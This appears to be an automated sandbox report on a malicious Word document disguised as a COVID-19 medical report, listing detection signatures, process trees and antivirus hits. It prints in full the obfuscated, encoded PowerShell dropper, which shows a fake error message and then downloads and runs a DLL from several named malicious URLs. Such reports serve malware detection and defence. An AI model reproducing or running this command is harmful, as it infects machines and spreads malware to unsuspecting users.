Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report XP-9743 Medical report COVID-19.doc

Overview

General Information

Sample Name:XP-9743 Medical report COVID-19.doc
Analysis ID:338773
MD5:da92c55d4b08367fb79a6bc6ae4da985
SHA1:8ee3239cfb5dd7d9ddd8e503c8fec19e21ca3c3d
SHA256:137602cebf7c61fe1bb6647160167813271afbd74a52fcccf03a0ad590a9ef61

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2336 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 1100 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAEAAJwArACgAJwB3ACcAKwAnAF0AeABtAFsAJwApACsAKAAnAHYAOgAvACcAKwAnAC8AJwApACsAKAAnAHcAdwAnACsAJwB3ACcAKQArACgAJwAuAGEAZwByACcAKwAnAGkAJwArACcAYwBhAG0AcAAnACsAJwBlAGcAJwApACsAKAAnAGcAaQAnACsAJwBvACcAKwAnAGMAbwByACcAKQArACgAJwB0AGUAJwArACcAYwBvAG0AbwAnACkAKwAnAHQAdAAnACsAJwBvAC4AJwArACgAJwBpAHQAJwArACcALwAnACkAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAJwArACcAZABtACcAKQArACgAJwBpACcAKwAnAG4AJwArACcALwBzADcAJwArACcAcAAxAC8AQAB3AF0AJwArACcAeABtAFsAJwApACsAJwB2ACcAKwAnAHMAOgAnACsAJwAvAC8AJwArACcAdwB3ACcAKwAnAHcAJwArACgAJwAuAHMAdABhAHIAbAAnACsAJwBpACcAKwAnAG4AJwApACsAKAAnAGcAdABlAGMAaABzAC4AYwBvAG0AJwArACcALwAnACsAJwBHAE4ATQAnACsAJwAvAEAAdwAnACsAJwBdAHgAbQBbAHYAJwApACsAKAAnADoAJwArACcALwAnACsAJwAvAGgAZQBsAGwAYQBzACcAKQArACgAJwAtAGQAJwArACcAYQByAG0AcwAnACsAJwB0AGEAZAAnACsAJwB0AC4AZAAnACsAJwBlACcAKQArACcALwBjACcAKwAoACcAZwBpAC0AYgBpAG4AJwArACcALwBaACcAKQArACcAUwAnACsAKAAnAG8AJwArACcAbwAvACcAKQApAC4AIgByAEUAcABsAEEAYABjAGUAIgAoACgAKAAnAHcAXQB4AG0AJwArACcAWwAnACkAKwAnAHYAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAcwAnACsAKAAnAGUAJwArACcAdwBmACcAKQApACwAKAAnAHcAZQAnACsAKAAnAHYAdwAnACsAJwBlACcAKQApACkALAAoACcAYQBlACcAKwAnAGYAZgAnACkALAAoACcAaAB0ACcAKwAnAHQAcAAnACkAKQBbADIAXQApAC4AIgBTAGAAUABMAEkAdAAiACgAJABPADUAXwBZACAAKwAgACQASgBiAHoAMwB5AGEAYQAgACsAIAAkAEwAXwAwAEMAKQA7ACQAVgAxADEAVgA9ACgAJwBIACcAKwAoACcAXwA4ACcAKwAnAE0AJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAE0AbAA5AHgAdwA3AG0AIABpAG4AIAAkAEoAaQB0AG8AYQAyAGUAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAHMAWQBTAHQAZQBtAC4ATgBFAFQALgB3AEUAQgBDAEwASQBFAG4AVAApAC4AIgBkAG8AVwBgAE4ATABPAGEARABGAEkAYABMAEUAIgAoACQATQBsADkAeAB3ADcAbQAsACAAJABHADYAYQBqAHYAOABkACkAOwAkAE0AMAA2AEsAPQAoACgAJwBBACcAKwAnADUAMQAnACkAKwAnAEIAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEcANgBhAGoAdgA4AGQAKQAuACIAbABgAEUATgBHAHQASAAiACAALQBnAGUAIAAzADAANAA0ADcAKQAgAHsAJgAoACcAcgAnACsAJwB1AG4AJwArACcAZABsAGwAMwAyACcAKQAgACQARwA2AGEAagB2ADgAZAAsACgAKAAnAFMAaAAnACsAJwBvACcAKQArACgAJwB3ACcAKwAnAEQAaQAnACsAJwBhAGwAbwAnACkAKwAnAGcAQQAnACkALgAiAHQAYABvAFMAVAByAGAASQBuAEcAIgAoACkAOwAkAFcANQAyAE0APQAoACgAJwBPADEAJwArACcAOQAnACkAKwAnAFIAJwApADsAYgByAGUAYQBrADsAJABLADgAMQBBAD0AKAAnAEUAJwArACgAJwA3ACcAKwAnADQARAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUwA1ADIATgA9ACgAJwBZADcAJwArACcAMgBTACcAKQA= MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2572 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2552 cmdline: powershell -w hidden -enc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAEAAJwArACgAJwB3ACcAKwAnAF0AeABtAFsAJwApACsAKAAnAHYAOgAvACcAKwAnAC8AJwApACsAKAAnAHcAdwAnACsAJwB3ACcAKQArACgAJwAuAGEAZwByACcAKwAnAGkAJwArACcAYwBhAG0AcAAnACsAJwBlAGcAJwApACsAKAAnAGcAaQAnACsAJwBvACcAKwAnAGMAbwByACcAKQArACgAJwB0AGUAJwArACcAYwBvAG0AbwAnACkAKwAnAHQAdAAnACsAJwBvAC4AJwArACgAJwBpAHQAJwArACcALwAnACkAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAJwArACcAZABtACcAKQArACgAJwBpACcAKwAnAG4AJwArACcALwBzADcAJwArACcAcAAxAC8AQAB3AF0AJwArACcAeABtAFsAJwApACsAJwB2ACcAKwAnAHMAOgAnACsAJwAvAC8AJwArACcAdwB3ACcAKwAnAHcAJwArACgAJwAuAHMAdABhAHIAbAAnACsAJwBpACcAKwAnAG4AJwApACsAKAAnAGcAdABlAGMAaABzAC4AYwBvAG0AJwArACcALwAnACsAJwBHAE4ATQAnACsAJwAvAEAAdwAnACsAJwBdAHgAbQBbAHYAJwApACsAKAAnADoAJwArACcALwAnACsAJwAvAGgAZQBsAGwAYQBzACcAKQArACgAJwAtAGQAJwArACcAYQByAG0AcwAnACsAJwB0AGEAZAAnACsAJwB0AC4AZAAnACsAJwBlACcAKQArACcALwBjACcAKwAoACcAZwBpAC0AYgBpAG4AJwArACcALwBaACcAKQArACcAUwAnACsAKAAnAG8AJwArACcAbwAvACcAKQApAC4AIgByAEUAcABsAEEAYABjAGUAIgAoACgAKAAnAHcAXQB4AG0AJwArACcAWwAnACkAKwAnAHYAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAcwAnACsAKAAnAGUAJwArACcAdwBmACcAKQApACwAKAAnAHcAZQAnACsAKAAnAHYAdwAnACsAJwBlACcAKQApACkALAAoACcAYQBlACcAKwAnAGYAZgAnACkALAAoACcAaAB0ACcAKwAnAHQAcAAnACkAKQBbADIAXQApAC4AIgBTAGAAUABMAEkAdAAiACgAJABPADUAXwBZACAAKwAgACQASgBiAHoAMwB5AGEAYQAgACsAIAAkAEwAXwAwAEMAKQA7ACQAVgAxADEAVgA9ACgAJwBIACcAKwAoACcAXwA4ACcAKwAnAE0AJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAE0AbAA5AHgAdwA3AG0AIABpAG4AIAAkAEoAaQB0AG8AYQAyAGUAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAHMAWQBTAHQAZQBtAC4ATgBFAFQALgB3AEUAQgBDAEwASQBFAG4AVAApAC4AIgBkAG8AVwBgAE4ATABPAGEARABGAEkAYABMAEUAIgAoACQATQBsADkAeAB3ADcAbQAsACAAJABHADYAYQBqAHYAOABkACkAOwAkAE0AMAA2AEsAPQAoACgAJwBBACcAKwAnADUAMQAnACkAKwAnAEIAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEcANgBhAGoAdgA4AGQAKQAuACIAbABgAEUATgBHAHQASAAiACAALQBnAGUAIAAzADAANAA0ADcAKQAgAHsAJgAoACcAcgAnACsAJwB1AG4AJwArACcAZABsAGwAMwAyACcAKQAgACQARwA2AGEAagB2ADgAZAAsACgAKAAnAFMAaAAnACsAJwBvACcAKQArACgAJwB3ACcAKwAnAEQAaQAnACsAJwBhAGwAbwAnACkAKwAnAGcAQQAnACkALgAiAHQAYABvAFMAVAByAGAASQBuAEcAIgAoACkAOwAkAFcANQAyAE0APQAoACgAJwBPADEAJwArACcAOQAnACkAKwAnAFIAJwApADsAYgByAGUAYQBrADsAJABLADgAMQBBAD0AKAAnAEUAJwArACgAJwA3ACcAKwAnADQARAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUwA1ADIATgA9ACgAJwBZADcAJwArACcAMgBTACcAKQA= MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2332 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2760 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2732 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Giyrh\pugu.vsm',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 1980 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivtnyogqxjx\ctmhexvkrv.xdn',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2724 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pvbzatsazzovzkv\hcdstjffkhswof.tvm',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2500 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ipdtn\rmgx.ktd',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 1776 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wxiibgduobebnp\hfpumnmgeezpt.jsh',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2808 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ndsevdxfleyh\dktakeexwon.agz',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 3068 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmtjatw\czosow.gcn',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 3012 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Udumexhq\tqqkqid.sqp',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: powershell -w hidden -enc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAEAAJwArACgAJwB3ACcAKwAnAF0AeABtAFsAJwApACsAKAAnAHYAO

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://hellas-darmstadt.de/cgi-bin/ZSoo/Avira URL Cloud: Label: malware
Source: http://solicon.us/allam-cycle-1c4gn/f5z/Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URLShow sources
Source: http://hellas-darmstadt.de/cgi-bin/ZSoo/Virustotal: Detection: 6%Perma Link
Source: http://solicon.us/allam-cycle-1c4gn/f5z/Virustotal: Detection: 6%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: XP-9743 Medical report COVID-19.docVirustotal: Detection: 19%Perma Link
Source: XP-9743 Medical report COVID-19.docReversingLabs: Detection: 13%
